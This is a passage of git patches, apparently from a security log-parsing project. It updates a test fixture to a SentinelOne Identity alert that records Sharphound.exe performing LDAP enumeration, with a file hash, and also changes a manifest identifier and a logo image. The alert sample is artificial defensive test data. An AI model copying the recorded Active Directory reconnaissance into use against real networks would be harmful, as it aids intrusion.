\"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n      \"type\": \"http\",\n      \"documentation\": \"\",\n      \"method\": \"get\",\n      \"endpoint\": \"test\",\n      \"responses\": [\n        {\n          \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n          \"body\": \"{\\n  \\\"message\\\": \\\"route required auth\\\"\\n}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    }\n  ],\n  \"rootChildren\": [\n    {\n      \"type\": \"route\",\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n    },\n    {\n      \"type\": \"folder\",\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n    },\n    {\n      \"type\": \"route\",\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n    }\n  ],\n  \"proxyMode\": false,\n  \"proxyHost\": \"\",\n  \"proxyRemovePrefix\": false,\n  \"tlsOptions\": {\n    \"enabled\": false,\n    \"type\": \"CERT\",\n    \"pfxPath\": \"\",\n    \"certPath\": \"\",\n    \"keyPath\": \"\",\n    \"caPath\": \"\",\n    \"passphrase\": \"\"\n  },\n  \"cors\": true,\n  \"headers\": [\n    {\n      \"key\": \"Content-Type\",\n      \"value\": \"application/json\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Origin\",\n      \"value\": \"*\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Methods\",\n      \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Headers\",\n      \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n    }\n  ],\n  \"proxyReqHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"proxyResHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"data\": [\n    {\n      \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n      \"id\": \"8wey\",\n      \"name\": \"Globals\",\n      \"documentation\": \"\",\n      \"value\": \"\"\n    },\n    {\n      \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n      \"id\": \"zzay\",\n      \"name\": \"ISODate\",\n      \"documentation\": \"Datetime shared format comes from backend\",\n      \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n    },\n    {\n      \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n      \"id\": \"g4qq\",\n      \"name\": \"CreateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n      \"id\": \"ofz6\",\n      \"name\": \"AuthenticateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n      \"id\": \"w34k\",\n      \"name\": \"User\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n  \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n  \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n  \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n    },\n    {\n      \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n      \"id\": \"77fk\",\n      \"name\": \"Authentication\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n    }\n  ],\n  \"callbacks\": []\n}"
+    "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
   },
   "expected": {
-    "message": "{\n  \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n  \"lastMigration\": 33,\n  \"name\": \"Mocked api\",\n  \"endpointPrefix\": \"\",\n  \"latency\": 0,\n  \"port\": 3000,\n  \"hostname\": \"\",\n  \"folders\": [\n    {\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n      \"name\": \"user\",\n      \"children\": [\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n        }\n      ]\n    }\n  ],\n  \"routes\": [\n    {\n      \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n      \"type\": \"http\",\n      \"documentation\": \"Creates new user\",\n      \"method\": \"post\",\n      \"endpoint\": \"user\",\n      \"responses\": [\n        {\n          \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"w34k\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"CreateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n      \"type\": \"http\",\n      \"documentation\": \"Logout\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/logout\",\n      \"responses\": [\n        {\n          \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n      \"type\": \"http\",\n      \"documentation\": \"Authenticate user with credentials\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/authenticate\",\n      \"responses\": [\n        {\n          \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"AuthenticateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n      \"type\": \"http\",\n      \"documentation\": \"Refresh Session\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/refresh-session\",\n      \"responses\": [\n        {\n          \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": true,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n      \"type\": \"http\",\n      \"documentation\": \"Auth required\",\n      \"method\": \"all\",\n      \"endpoint\": \"*\",\n      \"responses\": [\n        {\n          \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"header\",\n              \"modifier\": \"funfy-auth-token\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user/authenticate\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n      \"type\": \"http\",\n      \"documentation\": \"RefreshToken is required\",\n      \"method\": \"all\",\n      \"endpoint\": \"user/*\",\n      \"responses\": [\n        {\n          \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$.refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n      \"type\": \"http\",\n      \"documentation\": \"\",\n      \"method\": \"get\",\n      \"endpoint\": \"test\",\n      \"responses\": [\n        {\n          \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n          \"body\": \"{\\n  \\\"message\\\": \\\"route required auth\\\"\\n}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    }\n  ],\n  \"rootChildren\": [\n    {\n      \"type\": \"route\",\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n    },\n    {\n      \"type\": \"folder\",\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n    },\n    {\n      \"type\": \"route\",\n      \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n    }\n  ],\n  \"proxyMode\": false,\n  \"proxyHost\": \"\",\n  \"proxyRemovePrefix\": false,\n  \"tlsOptions\": {\n    \"enabled\": false,\n    \"type\": \"CERT\",\n    \"pfxPath\": \"\",\n    \"certPath\": \"\",\n    \"keyPath\": \"\",\n    \"caPath\": \"\",\n    \"passphrase\": \"\"\n  },\n  \"cors\": true,\n  \"headers\": [\n    {\n      \"key\": \"Content-Type\",\n      \"value\": \"application/json\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Origin\",\n      \"value\": \"*\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Methods\",\n      \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n    },\n    {\n      \"key\": \"Access-Control-Allow-Headers\",\n      \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n    }\n  ],\n  \"proxyReqHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"proxyResHeaders\": [\n    {\n      \"key\": \"\",\n      \"value\": \"\"\n    }\n  ],\n  \"data\": [\n    {\n      \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n      \"id\": \"8wey\",\n      \"name\": \"Globals\",\n      \"documentation\": \"\",\n      \"value\": \"\"\n    },\n    {\n      \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n      \"id\": \"zzay\",\n      \"name\": \"ISODate\",\n      \"documentation\": \"Datetime shared format comes from backend\",\n      \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n    },\n    {\n      \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n      \"id\": \"g4qq\",\n      \"name\": \"CreateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n      \"id\": \"ofz6\",\n      \"name\": \"AuthenticateUserRequest\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"type\\\": \\\"object\\\",\\n  \\\"properties\\\": {\\n    \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n    \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n  },\\n  \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n    },\n    {\n      \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n      \"id\": \"w34k\",\n      \"name\": \"User\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n  \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n  \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n  \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n    },\n    {\n      \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n      \"id\": \"77fk\",\n      \"name\": \"Authentication\",\n      \"documentation\": \"\",\n      \"value\": \"{\\n  \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n  \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n    }\n  ],\n  \"callbacks\": []\n}",
+    "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
     "event": {
       "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:50Z",
       "kind": "alert",
+      "provider": "Identity",
+      "reason": "This events is raised when a LDAP search Query is detected from the endpoint.",
+      "start": "2024-11-22T08:45:50Z",
       "type": "info"
     },
+    "@timestamp": "2024-11-22T08:45:50Z",
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
+    "process": {
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
     "sentinelone": {
       "identity": {
-        "name": "Mocked api"
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-dc47-75de-8925-5f026bd5a705",
+        "name": "LDAP Search Detected",
+        "status": "NEW"
       }
     }
   }

From 9daca2729d6227513899135a5e32b0eb8337b757 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 2 Dec 2024 18:41:51 +0100
Subject: [PATCH 305/317] fix(CybeReason): fix the identifier of the connector
 associated to the intake

---
 CybeReason/malop-json/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CybeReason/malop-json/_meta/manifest.yml b/CybeReason/malop-json/_meta/manifest.yml
index f1b4f8074..e4cdd5419 100644
--- a/CybeReason/malop-json/_meta/manifest.yml
+++ b/CybeReason/malop-json/_meta/manifest.yml
@@ -1,7 +1,7 @@
 uuid: 9f89b634-0531-437b-b060-a9d9f2d270db
 name: Cybereason EDR
 slug: cybereason-malop-json
-automation_connector_uuid: ff092b32-68dc-11ee-8c99-0242ac120002
+automation_connector_uuid: 8128d255-22df-4f4c-96af-ca6c1123f4cf
 automation_module_uuid: b96361fb-a01b-4ae7-8927-9622b9ea0acf
 
 description: >-

From 82eeda946e6c3e4819b3cf7808c6d5f0623bc8fc Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 3 Dec 2024 17:30:15 +0100
Subject: [PATCH 306/317] fix(SentinelOne): fix the logo for identity

---
 SentinelOne/identity/_meta/logo.png | Bin 27937 -> 1853 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png
index bad66643418120e4e1dbdc385258d64188b37661..817c84f53c5bbb9277dd6ba33f3ccb0ab2078e36 100644
GIT binary patch
literal 1853
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

literal 27937
zcmeFXWl)>Z_bwWsNb%ss358Oe0!50JAO#AfkO0A*;!@m;1-C+Jp-`X{2<}$gU5a~g
zhZ0;*`a3dn=YQ|FJ9FmDoOcF3<emNQz1M!8wVt)sj?hq3B*Le~2LJ#>Z<N6A002y#
ze}8y5=wF&GQx^aLyX`k%SuM}>gGG;YE^RN7<7HRNA3U{2%Z-h+?=KpR?NlHClmpQ5
zH+?bvZQ42`!z_bG+OU>N`)r*pD>z0#80RJzJB^xOlGMADcc$4xcy9iN>iwp~5!1Le
zTk&qm?%~nR)%Kymdm-1S#R_r5Uc;^c(Eok@uLb^(wE!Gr#|;Z%ZSNg1dtsS#eh>0y
z-fEpg>WOtdeBrExhp3bY0y;7IW6ir}Klt7qIo$0Bh5z~~S<DWyiJjlWAsw50n%E@j
